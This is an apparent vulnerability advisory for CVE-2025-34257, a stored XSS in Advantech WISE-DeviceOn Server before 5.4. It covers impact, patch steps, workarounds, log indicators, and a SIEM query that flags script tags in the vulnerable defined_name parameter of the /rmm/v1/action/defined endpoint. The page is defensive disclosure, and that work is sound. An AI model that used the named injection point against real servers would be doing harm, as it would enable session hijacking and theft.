CVE-2025-34257
📋 TL;DR
This stored XSS vulnerability in Advantech WISE-DeviceOn Server allows authenticated attackers to inject malicious scripts into task names that execute when other users view affected tasks. The vulnerability affects all versions prior to 5.4, potentially enabling session hijacking and unauthorized actions. Only authenticated users can exploit this vulnerability.
💻 Affected Systems
- Advantech WISE-DeviceOn Server
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attacker gains administrative privileges, compromises all user sessions, exfiltrates sensitive data, and performs unauthorized actions across the entire DeviceOn deployment.
Likely Case
Attacker hijacks user sessions to perform unauthorized actions, steal credentials, or modify system configurations within their authenticated access level.
If Mitigated
Limited impact due to proper input validation, output encoding, and Content Security Policy preventing script execution.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once authenticated
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.4
Restart Required: Yes
Instructions:
1. Download WISE-DeviceOn Server version 5.4 or later from Advantech support portal. 2. Backup current configuration and data. 3. Stop the DeviceOn service. 4. Install the updated version. 5. Restart the service. 6. Verify the fix by checking the version.
🔧 Temporary Workarounds
Input Validation Filter
allImplement web application firewall or proxy filtering to sanitize defined_name parameter values
Content Security Policy
allImplement strict CSP headers to prevent script execution from untrusted sources
🧯 If You Can't Patch
- Implement strict input validation and output encoding for the defined_name parameter
- Restrict access to the /rmm/v1/action/defined endpoint to only necessary users
🔍 How to Verify
Check if Vulnerable:
Check if current version is below 5.4 and test if unsanitized HTML input in defined_name parameter executes in Overview pageCheck Version:
Check DeviceOn web interface admin panel or consult system documentation for version informationVerify Fix Applied:
After patching to 5.4+, verify that HTML/script input in defined_name parameter is properly sanitized and doesn't execute📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /rmm/v1/action/defined with script tags or JavaScript in defined_name parameter
- Multiple failed login attempts followed by successful authentication and task creation
Network Indicators:
- HTTP requests containing script tags or JavaScript code in defined_name parameter
- Unusual outbound connections from DeviceOn server after task views
SIEM Query:
source="deviceon-logs" AND (uri_path="/rmm/v1/action/defined" AND (param="defined_name" AND value CONTAINS "<script>" OR value CONTAINS "javascript:"))🔗 References
- https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf
- https://docs.deviceon.advantech.com/docs/resource/
- https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-action-defined
